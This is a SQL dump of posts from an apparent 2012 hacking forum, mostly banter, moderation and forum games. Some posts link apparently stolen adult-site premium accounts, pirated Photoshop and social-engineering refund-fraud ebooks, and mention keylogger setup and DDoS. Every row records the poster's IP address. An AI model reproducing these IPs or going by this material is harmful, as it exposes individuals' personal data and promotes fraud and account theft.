spelling.\r\n[/quote]\r\n\r\nBanned for having good grammar and spelling.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '2ed554464bf90dbfcd7b7bf4edfa4518', '0', '0'); INSERT INTO mybb_posts VALUES('1041', '244', '0', '33', 'Tips on rating GFX', '0', '82', 'iTzIpod', '1345961374', 'Hey LH,\n\nHere are some key points to remember when rating another user\'s GFX work:\n\n1. Choice of color\n2. Blending\n3. Depth\n4. Renders \n5. Effects \n6. Text\n\nAlso an overall rating out of 10 would be helpful for the user after giving them your comments.', '24.212.197.164', '416597412', '1', '0', '82', '1345961637', '1', '4fd26fb38738ccf76fc80a1c7093c182', '0', '1345961637'); INSERT INTO mybb_posts VALUES('1052', '244', '1041', '33', 'RE: Tips on rating GFX', '0', '2', 'Apathy', '1345986783', 'Another thing that should be added is be good at graphics before trying to actually do a in depth rating.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '647097da71eface00a38ee8b0bb501d0', '0', '0'); INSERT INTO mybb_posts VALUES('1044', '30', '84', '12', 'RE: HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '53', 'sirchamp', '1345973716', 'Give credit to the real thread maker: criticallygeek.in/2012/02/how-to-setup-rinlogger-complete-and.html', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '938a9ba307e83501e2d766251773fcf0', '0', '0'); INSERT INTO mybb_posts VALUES('1045', '246', '0', '11', 'Safety for Safety\'s sake', '0', '48', 'BurnsH4X', '1345978650', 'so i would like to stay protected online and i currently use hotspotshield (VPN) but the free version is very slow so dose anyone know a free fast vpn service (DDosing might be involved in my activities)', '46.11.104.187', '772499643', '0', '0', '0', '0', '1', '3d69604d6d837c02f484d4df989efc46', '0', '0'); INSERT INTO mybb_posts VALUES('1043', '152', '400', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '53', 'sirchamp', '1345970085', 'No virus. thanks so much for this.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '621c5c226ed7eaa880161514677adcb5', '0', '0'); INSERT INTO mybb_posts VALUES('1046', '152', '1043', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '54', 'Sin Cara', '1345984409', '[quote=\'sirchamp\' pid=\'1043\' dateline=\'1345970085\']\r\nNo virus. thanks so much for this.\r\n[/quote]\r\n\r\nYou are come come bro ;)', '119.154.5.233', '2006582761', '1', '0', '0', '0', '1', 'ea204ea245192930227f929538e3d771', '0', '0'); INSERT INTO mybb_posts VALUES('1047', '220', '899', '55', 'RE: Windows 7 Ultimate', '0', '112', '??????Z', '1345984626', 'POS.. Piece of shit. :)', '92.22.242.209', '1545007825', '0', '0', '0', '0', '1', 'b3d1e17e7f33a7dd066fe95efac3b140', '0', '0'); INSERT INTO mybb_posts VALUES('1179', '247', '1055', '16', 'RE: [Free] [EBook] How to SE Pringles', '0', '112', '??????Z', '1346107133', 'yeah same, directs you to the kellogs page and there is no pringles in the list', '92.22.242.209', '1545007825', '0', '0', '0', '0', '1', 'f134f043468079dbdc55adb3c36a0493', '0', '0'); INSERT INTO mybb_posts VALUES('1049', '113', '286', '15', 'RE: ?Auto Youtube viewer?', '0', '53', 'sirchamp', '1345986012', 'False detection. For instance let me ask you something. Why doesnt Avast detect it?', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '8b18684f6e5f535c5c8941af2fda5548', '0', '0'); INSERT INTO mybb_posts VALUES('1050', '25', '71', '19', 'RE: Blackhat System Scanner', '0', '48', 'BurnsH4X', '1345986015', 'y dose avg say its a virus?', '46.11.104.187', '772499643', '0', '0', '0', '0', '1', 'df5452602890a73e532ab76ad5b1647a', '0', '0'); INSERT INTO mybb_posts VALUES('1051', '238', '1021', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1345986611', 'Banned for having good grammar and spelling.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'b965df065daa95bdbe6ec262c4303028', '0', '0'); INSERT INTO mybb_posts VALUES('1053', '238', '1021', '56', 'RE: Ban the user above you', '0', '67', 'HoverCatz', '1345990823', 'Banned for reason: Red name', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '70b060e42db0dda8faea2700f527be1a', '0', '0'); INSERT INTO mybb_posts VALUES('1054', '238', '1021', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1345990990', 'Banned everyone else because I am a admin and can actually do it :)', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'a339bc8bb17defbd3d997d747ffb61be', '0', '0'); INSERT INTO mybb_posts VALUES('1055', '247', '0', '16', '[Free][EBook] How to SE Pringles', '0', '82', 'iTzIpod', '1345991171', 'Hey LH,\nJust trying to contribute to the forums.\nThis eBook gives you a technique to SE Pringles. \nIt is guaranteed to work every time. \n\nTo download: \n\nhttp://adf.ly/DB5VW', '24.212.197.164', '416597412', '1', '0', '82', '1348618147', '1', '7bbaffc7cc8b13818c7bdf0de5e9bc29', '0', '1348618147'); INSERT INTO mybb_posts VALUES('1056', '248', '0', '16', '[Free][EBook] How to SE a 3DS', '0', '82', 'iTzIpod', '1345991325', 'Hey LH,\nJust trying to contribute to the forums.\n\nThis eBook will not be guaranteed to work 100%. But it still works if you got the skills. \n\nTo Download: \nhttp://adf.ly/DB5Sh', '24.212.197.164', '416597412', '1', '0', '82', '1348618098', '1', 'c27978ccb089088d45682c58cc3019a2', '0', '1348618098'); INSERT INTO mybb_posts VALUES('1057', '249', '0', '56', 'Last person to reply, wins!', '0', '82', 'iTzIpod', '1345991527', 'Title says it all. \r\nWhoever is the last person to reply to this thread, wins!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1a6d25e98c20caa054b3ae31c03b23a0', '0', '0'); INSERT INTO mybb_posts VALUES('1058', '241', '1028', '49', 'RE: [Suggestion] Questions Section', '0', '20', 'JakeUS', '1345992133', 'You can just ask questions through private messages or the rules and announcements section.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '6e9f77fba645ab5343865680b8ede597', '0', '0'); INSERT INTO mybb_posts VALUES('1059', '240', '1025', '3', 'RE: [Bug] Complaints & Rep Abuse Support', '0', '20', 'JakeUS', '1345992181', 'PM Joker about this.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'e849f06b007cb9388c145e658ac7fa4a', '0', '0'); INSERT INTO mybb_posts VALUES('1060', '250', '0', '42', 'Saturday is deadliest day in Syrian civil war', '0', '82', 'iTzIpod', '1345994060', 'Before I start,\r\nThis is a long article. Just click on the Original Link below. And watch the video or read the article.\r\n---------------------------------------\r\n\r\n(CNN) -- At least 330 people were reported dead Saturday in Syria, marking the highest single-day death toll since the start of the uprising, according to opposition activists. With one week left to go, August is already the deadliest month. Here are some of the other key developments on the crisis that is spiraling out of control:\r\nOn the ground: Deaths mount as assault intensifies\r\nSaturday\'s death toll includes the bodies of more than 200 people that were found in and around Damascus, namely Daraya, according to the Local Coordination Committees of Syria, a network of opposition activists. It was unclear when those victims were killed.\r\nSaturday\'s death toll is the highest single-day figure since the start of the uprising, said a spokesman for the group.\r\nCNN is unable to independently verify reports of violence as Syria has severely limited access to international journalists.\r\nWith one week left to go, August is already the deadliest month in Syria\'s 17-month crisis. Opposition activists report more than 3,700 people killed -- mostly civilians -- in just the past few weeks.\r\nPrior to Saturday, the single bloodiest day was reported on July 12. At least 287 people were killed then, including 220 in Hama province, according to the LCC.\r\nThe Syrian military\'s frontal assault on the opposition appears to be ratcheting up, with indiscriminate bombings from jets and rockets fired into civilian areas.\r\nMore than 10 missiles landed in Idlib province as planes opened fire with machine guns, the LCC said. Meanwhile, residents in Aleppo endured \"intense aerial shelling\" by a regime warplane Saturday, the group said.\r\n Photos: Showdown in Syria\r\n Alawite voices inside Lebanon Lebanon pulled deep into Syria conflict \'Syria becoming a proxy war\'\r\nPresident Bashar al-Assad\'s government had a different take on the situation in Aleppo, the commercial and cultural heart of Syria.\r\n\"Armed forces continue pursuing terrorists in Aleppo and its countryside,\" state-run media proclaimed. \"Armed forces destroy seven cars equipped with machine guns, kill terrorists and seize their weapons in Aleppo city.\"\r\nThe region: Abducted Lebanese pilgrim freed\r\nHussein Ali Omar, one of 11 Lebanese Shiite pilgrims abducted in Syria, was in Turkey on Saturday after being released, according to a representative for Turkey\'s foreign minister.\r\n\"We are trying to get him to his country,\" the representative said. \"We think our efforts may have helped.\" The Free Syrian Army has denied an allegation it was involved in the May abductions. The other 10 pilgrims are still being held.\r\nThe development follows the kidnapping in Damascus of a Lebanese man, Hassan Salim Meqdad, by Syrian rebels who accused him of being a Hezbollah member. In response, Meqdad\'s brother, Hatem Meqdad, told Lebanon\'s state news agency that his family kidnapped 26 Syrians living in Lebanon.\r\nTurkish Foreign Minister Ahmet Davutoglu, meanwhile, rejected claims that his country was shipping weapons to Syrian rebels in their quest to oust al-Assad, the Anadolu news agency reported.\r\n\"These are the arguments which authoritarian regimes had always used to conceal their internal problems,\" Davutoglu told the NTV news channel, according to Anadolu.\r\nDavutoglu added, \"No regime fighting its own people can survive long. (The al-Assad regime) has months, and maybe even weeks -- not years.\"\r\nDiplomatic front: New envoy says Syrian people are \'our first masters\'\r\nLakhdar Brahimi is the new U.N. and Arab League envoy to Syria, but he said the Syrian people will be \"our first masters.\"\r\n\"We will consider their interests above and before anyone else,\" the Algerian and longtime U.N. diplomat said Friday.\r\nBrahimi, who replaces Kofi Annan after months of fizzled attempts to broker peace in Syria, told U.N. Secretary-General Ban Ki-moon of his anxiety about the new post:\r\n\"Secretary-general, when you called me, I told you that I was honored, flattered, humbled and scared, and still in that frame of mind. I will definitely give this my very, very best,\" Brahimi said.\r\nThe Syrian crisis broke out in March 2011 after protesters, inspired by the success of popular uprisings in Egypt and Tunisia, took to the streets demanding political reform and an end to four decades of al-Assad family rule.\r\nThe movement devolved into an armed conflict after a brutal crackdown by al-Assad\'s forces. Opposition forces say more than 21,000 people have died.\r\nSyria 101: A crash course on the conflict\r\nCNN\'s Saad Abedine, Holly Yan and Jim Clancy contributed to this report.\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nOriginal Link:\r\nhttp://www.cnn.com/2012/08/25/world/meast/syria-civil-war/index.html?hpt=wo_c1', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e98387e0a073d90d433b11706c543eda', '0', '0'); INSERT INTO mybb_posts VALUES('1061', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '53', 'sirchamp', '1345997418', 'So actually with always new members incoming this could go 4ever.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'de972bfeb6a81a80cdce334e868b592f', '0', '0'); INSERT INTO mybb_posts VALUES('1062', '208', '788', '7', 'RE: I m feeling happy ;)', '0', '53', 'sirchamp', '1345998440', 'HF is the best hacking forum out there at the moment. And isnt the word phishing also censored?Edit: It isnt censored anymore.', '188.155.56.90', '-1130678182', '1', '0', '53', '1345998468', '1', 'b7097e977d1b103486dd817ffc0645ce', '0', '1345998468'); INSERT INTO mybb_posts VALUES('1063', '251', '0', '19', '[Junk]sig', '0', '127', 'Eucliwood', '1346000124', 'how long is my \'\'edit signature\'\' gona be disabled?', '88.88.71.130', '1482180482', '1', '0', '1', '1346074960', '1', 'f972f5f8ccfa8b98e9c8e17201d30ab4', '0', '1346074960'); INSERT INTO mybb_posts VALUES('1064', '231', '929', '4', 'RE: Sup', '0', '127', 'Eucliwood', '1346000266', 'umm, i dont get how that was taken as \'\'adult content\'\' it\'s a part intro scene from a serie called Deadman Wonderland.\r\n\r\n\r\nwhat is \'\'adult\'\' in this? she is not naked...\r\n[img]http://sadpanda.us/images/1105704-K27WQSV.gif[/img]', '88.88.71.130', '1482180482', '1', '0', '127', '1346000470', '1', 'd3b43e6c0f80334f210b2caaa306e6bf', '0', '1346000470'); INSERT INTO mybb_posts VALUES('1065', '231', '929', '4', 'RE: Sup', '0', '53', 'sirchamp', '1346007054', 'That really scares me :D all the blood.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'c11e12f702fbc03fb5f310bcc2a61f30', '0', '0'); INSERT INTO mybb_posts VALUES('1066', '231', '929', '4', 'RE: Sup', '0', '127', 'Eucliwood', '1346008873', 'blood/red smoke, how is even that \'\'adult\'\' ?', '88.88.71.130', '1482180482', '1', '0', '0', '0', '1', 'd876b0c4be968ae3af19dd9c6a1d63ac', '0', '0'); INSERT INTO mybb_posts VALUES('1067', '251', '1063', '19', 'RE: sig', '0', '67', 'HoverCatz', '1346012999', 'He said 2 days', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'c6522959177bcaddff27f646cdd25e2d', '0', '0'); INSERT INTO mybb_posts VALUES('1068', '251', '1063', '19', 'RE: sig', '0', '127', 'Eucliwood', '1346013059', '^ no reason...........................', '88.88.71.130', '1482180482', '1', '0', '0', '0', '1', 'e4b0c3e56e7625e124f35411d134975c', '0', '0'); INSERT INTO mybb_posts VALUES('1069', '239', '1022', '7', 'RE: 1000th Post', '0', '1', 't3h jok3r', '1346014610', 'I didn\'t even notice. Thanks to everyone who helped LH reach 1K posts.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '4f96edbf63b2e562f80e375cd1e9bb31', '0', '0'); INSERT INTO mybb_posts VALUES('1070', '240', '1025', '3', 'RE: [Bug] Complaints & Rep Abuse Support', '0', '1', 't3h jok3r', '1346014775', 'Thanks for the report. I have double checked this and it seems to be working perfectly. Only Staff and the poster can see their own threads.\n\nMods can see it I think, because they are moderating that forum.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', 'e9b20dde8030f2f38f3aeb7e7b2fa858', '0', '0'); INSERT INTO mybb_posts VALUES('1071', '231', '1064', '4', 'RE: Sup', '0', '1', 't3h jok3r', '1346015256', '[quote=\'Eucliwood\' pid=\'1064\' dateline=\'1346000266\']\r\numm, i dont get how that was taken as \'\'adult content\'\' it\'s a part intro scene from a serie called Deadman Wonderland.\r\n\r\n\r\nwhat is \'\'adult\'\' in this? she is not naked...\r\n[img]http://sadpanda.us/images/1105704-K27WQSV.gif[/img]\r\n[/quote]\r\n\r\nThe nipples are visible and clear. Which is considered adult content. I gave you 20% warning, but since you were new I just removed the signature.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', 'ce101cf521c6576e9c6905257c9d91f5', '0', '0'); INSERT INTO mybb_posts VALUES('1072', '251', '1063', '19', 'RE: sig', '0', '1', 't3h jok3r', '1346015292', 'Please have a look at my reply on your welcome thread.\n\nhttp://l33thacking.com/showthread.php?tid=231&pid=1071#pid1071\n\nThere\'s just one day left.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', 'caf94ab540b9af971ae97017d2f83402', '0', '0'); INSERT INTO mybb_posts VALUES('1073', '207', '776', '3', 'RE: Suggest awards and apply for awards', '0', '1', 't3h jok3r', '1346015422', 'I honestly don\'t think the trusted award is the best thing to implement, because some people will act decent till they get the award then scam members like shit.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '84ada7e82bb9d151a0e451a55acbf4d9', '0', '0'); INSERT INTO mybb_posts VALUES('1075', '236', '1002', '49', 'RE: [Suggestion] Reporting Posts', '0', '1', 't3h jok3r', '1346015718', 'Nice idea but the thing is that it\'s easier to understand posts and remove them on our discretion. If we add this feature then it will mess up our reports section.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '87f77188e5d52ef29da48f7af32394b3', '0', '0'); INSERT INTO mybb_posts VALUES('1078', '233', '968', '58', 'RE: Reviewers Group???', '0', '1', 't3h jok3r', '1346016300', 'You guys have a point, we do have enough active members to keep LH up for long but not the marketplace active. I guess apathy could be in-charge of reviews/vouches for now, if not then Jakeus.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', 'bd7b633e8cdbc0f0d85aaadffe33bf7a', '0', '0'); INSERT INTO mybb_posts VALUES('1079', '250', '1060', '42', 'RE: Saturday is deadliest day in Syrian civil war', '0', '1', 't3h jok3r', '1346016502', 'RIP all the ones who have passed away. I don\'t understand why would you kill a stranger?', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', 'db4969d4f816aef40b4ea782f3fb85b2', '0', '0'); INSERT INTO mybb_posts VALUES('1080', '130', '995', '15', 'RE: Skype IP Finder - FREE', '0', '1', 't3h jok3r', '1346016634', '[quote=\'iTzIpod\' pid=\'995\' dateline=\'1345949340\']\r\n[quote=\'t3h jok3r\' pid=\'981\' dateline=\'1345940956\']\r\nOh I see. Finally one of my giveaways were useful for a moment.\r\n[/quote]\r\n\r\nWait so this no longer works? Even with your API in the + Section?\r\n[/quote]\r\n\r\nCheck out the thread for the update.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '811e093a6ab34f8d552aab0738b5c063', '0', '0'); INSERT INTO mybb_posts VALUES('1081', '238', '1021', '56', 'RE: Ban the user above you', '0', '10', 'swa4567', '1346016741', 'Banned for abusing admin powers.', '41.151.135.157', '697796509', '0', '0', '0', '0', '1', 'd21e99db9b5320e83f11cb2d9da77901', '0', '0'); INSERT INTO mybb_posts VALUES('1082', '134', '341', '47', 'RE: Win $10 for referring people', '0', '10', 'swa4567', '1346016795', 'Damn this guy is trying his best for the $10.', '41.151.135.157', '697796509', '0', '0', '0', '0', '1', '6e69796354fe5ce92716df132ac24f2f', '0', '0'); INSERT INTO mybb_posts VALUES('1083', '191', '666', '15', 'RE: ProDos v1.0', '0', '10', 'swa4567', '1346017051', 'How do you know it\'s made in gamemaker?', '41.151.135.157', '697796509', '0', '0', '0', '0', '1', 'd85a0e7a671640ae67973ee58c56bc56', '0', '0'); INSERT INTO mybb_posts VALUES('1084', '239', '1022', '7', 'RE: 1000th Post', '0', '10', 'swa4567', '1346017187', 'So when we post a thread, it also increases a post count?', '41.151.135.157', '697796509', '0', '0', '0', '0', '1', '32336682f14bcb3082bb654e373a724a', '0', '0'); INSERT INTO mybb_posts VALUES('1085', '43', '105', '7', 'RE: How did you find us?', '0', '10', 'swa4567', '1346017247', 'Someone sent me a message on YouTube telling me to j0in this site to hack websites.', '41.151.135.157', '697796509', '0', '0', '0', '0', '1', '318e9a12bd91c2fa53295ab39479c2c7', '0', '0'); INSERT INTO mybb_posts VALUES('1086', '246', '1045', '11', 'RE: Safety for Safety\'s sake', '0', '10', 'swa4567', '1346017364', 'Cyberghost VPN is also good, but you need to open and keep the program opened I think. \n\nHave a look here: http://l33thacking.com/showthread.php?tid=123&action=lastpost', '41.151.135.157', '697796509', '0', '0', '0', '0', '1', '065e0945f495983d51ffd05e44228ea3', '0', '0'); INSERT INTO mybb_posts VALUES('1087', '200', '871', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '1', 't3h jok3r', '1346018077', '[quote=\'iTzIpod\' pid=\'871\' dateline=\'1345867049\']\r\n[quote=\'t3h jok3r\' pid=\'814\' dateline=\'1345848129\']\r\n[quote=\'iTzIpod\' pid=\'753\' dateline=\'1345818053\']\r\n[quote=\'t3h jok3r\' pid=\'746\' dateline=\'1345817347\']\r\nhttp://dl.dropbox.com/u/26951938/Photoshop.rar \r\n\r\nIt\'s CS5 though, also It\'s clean. I checked the virus total scan before downloading and the sandbox control panel seems to be OK.\r\n\r\nENJOY!\r\n[/quote]\r\n\r\nIs it Portable? :3 Or just the regular Adobe Photoshop CS5? Or Extended? Etc.\r\n[/quote]\r\n\r\nIt\'s :opps:\r\n\r\nUmmm :thinking:\r\n\r\nPortable I guess cause it\'s basically a zip with a lot of files and the main PS program is in the zip. All you have to do is extract the content and open up PS to start using it.\r\n[/quote]\r\n\r\nIt\'s the normal Adobe Photoshop CS6 :p \r\n\r\nPortable takes up less space. That\'s why I want to get portable.\r\n[/quote]\r\n\r\nYou sure it\'s CS6? In the title it says CS5.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', 'c8db882373673bd4d755ad8bba8282fc', '0', '0'); INSERT INTO mybb_posts VALUES('1088', '184', '826', '35', 'RE: [Video] I\'m a video editor!', '0', '1', 't3h jok3r', '1346018187', '[quote=\'iTzIpod\' pid=\'826\' dateline=\'1345849582\']\r\n[quote=\'t3h jok3r\' pid=\'823\' dateline=\'1345848802\']\r\n[quote=\'iTzIpod\' pid=\'817\' dateline=\'1345848351\']\r\n[quote=\'t3h jok3r\' pid=\'811\' dateline=\'1345847969\']\r\nI wish I could view videos :(\r\n[/quote]\r\n\r\nIs that because of the slow internet connection?\r\n[/quote]\r\n\r\nYup, that\'s correct. I can\'t even watch my favourite TV show, which is prison break.\r\n[/quote]\r\n\r\nLol I can give you a free Netflix account. You can watch Prison Break on it. Unless that won\'t work? :o\r\n[/quote]\r\nCan\'t but next week I\'m going back so I\'ll be able to watch videos easily.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '9df4e00b096f9d8f093e5c5b43664e8f', '0', '0'); INSERT INTO mybb_posts VALUES('1089', '252', '0', '54', 'August 27, 2012 XXXX Accounts', '0', '1', 't3h jok3r', '1346021770', 'BRAZZERS 27X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/5y8hinimflqo]DOWNLOAD BOX[/url][/u]\r\n\r\nMOFOS 32X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/q7sroqz5htn1]DOWNLOAD BOX[/url][/u]\r\n\r\nTWISTYS 30X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/njxt674e0o1c]DOWNLOAD BOX[/url][/u] \r\n\r\nHUSTLER 26X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/4sgpeh9icfm8]DOWNLOAD BOX[/url][/u]\r\n\r\nNAUGHTY AMERICA 29X PREMIUM ACCOUNT: [u][url=http://www.filedownloads.org/v7byyctmv62i]DOWNLOAD BOX[/url][/u]\r\n\r\nCredits: blogging', '41.150.211.22', '697750294', '1', '0', '0', '0', '1', '8b2db9527bf2e2906f38c14ee45d4725', '0', '0'); INSERT INTO mybb_posts VALUES('1090', '247', '1055', '16', 'RE: [Free] [EBook] How to SE Pringles', '0', '90', 'duhuh', '1346025925', 'its werid last time i went to SE pringles there was no \'pringles\' on the drop down list which is gay, ( i am also from UK)', '86.184.185.30', '1454946590', '0', '0', '0', '0', '1', '206b7ebde58c2349f3456acadf69e3c0', '0', '0'); INSERT INTO mybb_posts VALUES('1091', '233', '1078', '58', 'RE: Reviewers Group???', '0', '2', 'Apathy', '1346026572', '[quote=\'t3h jok3r\' pid=\'1078\' dateline=\'1346016300\']\r\nYou guys have a point, we do have enough active members to keep LH up for long but not the marketplace active. I guess apathy could be in-charge of reviews/vouches for now, if not then Jakeus.\r\n[/quote]\r\n\r\nMe. I was the reviewers leader on a different bh site. (now closed) and get in skype.', '173.206.130.220', '-1378975012', '0', '0', '0', '0', '1', '51a07daadddd0f1d8dd82d2c35f596c8', '0', '0'); INSERT INTO mybb_posts VALUES('1092', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '2', 'Apathy', '1346026655', 'What do I win?', '173.206.130.220', '-1378975012', '0', '0', '0', '0', '1', 'db2550ea417a51f906754481c80a87aa', '0', '0'); INSERT INTO mybb_posts VALUES('1121', '255', '0', '5', 'IMPORTANT!!!', '0', '1', 't3h jok3r', '1346074273', 'I would like to discuss two things in this thread.\r\n\r\n1. What color should I change the upgraded members username color to?\r\n\r\n2. When you get a report on a post, [b]DON\'T[/b] junk the whole thread. Click on the [b]POST ID[/b] then remove the post that falls under the post id because the post is reported not the whole thread.', '41.151.156.103', '697801831', '1', '0', '0', '0', '1', 'c18f4d1c7b6a13275d55a6dd37321acd', '0', '0'); INSERT INTO mybb_posts VALUES('1094', '240', '1070', '3', 'RE: [Bug] Complaints & Rep Abuse Support', '0', '82', 'iTzIpod', '1346032320', '[quote=\'t3h jok3r\' pid=\'1070\' dateline=\'1346014775\']\r\nThanks for the report. I have double checked this and it seems to be working perfectly. Only Staff and the poster can see their own threads.\r\n\r\nMods can see it I think, because they are moderating that forum.\r\n[/quote]\r\n\r\nI can\'t see any threads in there now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '235b6d45ab96cfc4555e0cc98a8c13a5', '0', '0'); INSERT INTO mybb_posts VALUES('1095', '184', '1088', '35', 'RE: [Video] I\'m a video editor!', '0', '82', 'iTzIpod', '1346032810', '[quote=\'t3h jok3r\' pid=\'1088\' dateline=\'1346018187\']\r\n[quote=\'iTzIpod\' pid=\'826\' dateline=\'1345849582\']\r\n[quote=\'t3h jok3r\' pid=\'823\' dateline=\'1345848802\']\r\n[quote=\'iTzIpod\' pid=\'817\' dateline=\'1345848351\']\r\n[quote=\'t3h jok3r\' pid=\'811\' dateline=\'1345847969\']\r\nI wish I could view videos :(\r\n[/quote]\r\n\r\nIs that because of the slow internet connection?\r\n[/quote]\r\n\r\nYup, that\'s correct. I can\'t even watch my favourite TV show, which is prison break.\r\n[/quote]\r\n\r\nLol I can give you a free Netflix account. You can watch Prison Break on it. Unless that won\'t work? :o\r\n[/quote]\r\nCan\'t but next week I\'m going back so I\'ll be able to watch videos easily.\r\n[/quote]\r\n\r\n\r\n\r\n\r\nOh. That\'s good! Glad to here!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '44d03381cddc6a6785ea9ecd3d19b74e', '0', '0'); INSERT INTO mybb_posts VALUES('1096', '249', '1092', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1346034594', '[quote=\'Apathy\' pid=\'1092\' dateline=\'1346026655\']\r\nWhat do I win?\r\n[/quote]\r\n\r\n\r\nYou win nothing. It is just a forum game. \r\n\r\nOT: Replying to win', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6d2981f882b475bd234e6d42f1f342bc', '0', '0'); INSERT INTO mybb_posts VALUES('1097', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '55', 'Baws', '1346034954', 'no @ an admin close thread, now.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'db55f5f99c1f61a92f3ff99050c2878f', '0', '0'); INSERT INTO mybb_posts VALUES('1098', '238', '1021', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346035043', 'Banned for having 12 posts, and being gay.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '2662750114b843c9f0b6b7e14adc1c80', '0', '0'); INSERT INTO mybb_posts VALUES('1099', '134', '1082', '47', 'RE: Win $10 for referring people', '0', '82', 'iTzIpod', '1346035044', '[quote=\'swa4567\' pid=\'1082\' dateline=\'1346016795\']\r\nDamn this guy is trying his best for the $10.\r\n[/quote]\r\n\r\nYeah. I need $10 really badly. I have to pay for some things. :/ I can spend it in 2 seconds once I will or might get it :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5a83a45627c3ec956b29483f23a6951a', '0', '0'); INSERT INTO mybb_posts VALUES('1100', '200', '1087', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '82', 'iTzIpod', '1346036935', '[quote=\'t3h jok3r\' pid=\'1087\' dateline=\'1346018077\']\r\n[quote=\'iTzIpod\' pid=\'871\' dateline=\'1345867049\']\r\n[quote=\'t3h jok3r\' pid=\'814\' dateline=\'1345848129\']\r\n[quote=\'iTzIpod\' pid=\'753\' dateline=\'1345818053\']\r\n[quote=\'t3h jok3r\' pid=\'746\' dateline=\'1345817347\']\r\nhttp://dl.dropbox.com/u/26951938/Photoshop.rar \r\n\r\nIt\'s CS5 though, also It\'s clean. I checked the virus total scan before downloading and the sandbox control panel seems to be OK.\r\n\r\nENJOY!\r\n[/quote]\r\n\r\nIs it Portable? :3 Or just the regular Adobe Photoshop CS5? Or Extended? Etc.\r\n[/quote]\r\n\r\nIt\'s :opps:\r\n\r\nUmmm :thinking:\r\n\r\nPortable I guess cause it\'s basically a zip with a lot of files and the main PS program is in the zip. All you have to do is extract the content and open up PS to start using it.\r\n[/quote]\r\n\r\nIt\'s the normal Adobe Photoshop CS6 :p \r\n\r\nPortable takes up less space. That\'s why I want to get portable.\r\n[/quote]\r\n\r\nYou sure it\'s CS6? In the title it says CS5.\r\n[/quote]\r\n\r\nWhoops :/ Made a typo. I wrote that on my Mobile.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd481406a49f41ccba71447ca25e949e4', '0', '0'); INSERT INTO mybb_posts VALUES('1101', '231', '929', '4', 'RE: Sup', '0', '61', 'NXK', '1346039607', 'Welcome, Enjoy it here. Stay HQ', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '7321e203b686e3eb6f0b5dad138b5bc3', '0', '0'); INSERT INTO mybb_posts VALUES('1102', '238', '1021', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1346042517', 'Banned for trying to suck swa off', '173.206.130.220', '-1378975012', '0', '0', '0', '0', '1', 'e98f034330ef8d386697fec4b8faa1ec', '0', '0'); INSERT INTO mybb_posts VALUES('1104', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '84', 'Thunder™', '1346045322', 'Grey looks to dull for elites.', '111.91.95.104', '1868259176', '0', '0', '0', '0', '1', '92a8c66f8d0ad0ed60ddd22234fa0d37', '0', '0'); INSERT INTO mybb_posts VALUES('1105', '213', '850', '58', 'RE: What group(s) would you like to see?', '0', '84', 'Thunder™', '1346045493', 'I would Love to see Gamers Group.', '111.91.95.104', '1868259176', '0', '0', '0', '0', '1', '1e5774996f730a42232d86f721840a87', '0', '0'); INSERT INTO mybb_posts VALUES('1106', '253', '0', '56', 'Count to 200', '0', '84', 'Thunder™', '1346045869', '1. The Game Begains :)\r\n:lol::lol::lol:', '111.91.95.104', '1868259176', '0', '0', '0', '0', '1', '07d19b183ca473f5f77bdfd4ae71b860', '0', '0'); INSERT INTO mybb_posts VALUES('1107', '254', '0', '49', 'Gamers Section', '0', '84', 'Thunder™', '1346046025', 'I Would love to see Gamers Section\r\nSubForums :~ \r\nCounterstrike and Steam,\r\nPc,\r\nXbox,Etc', '111.91.95.104', '1868259176', '0', '0', '0', '0', '1', 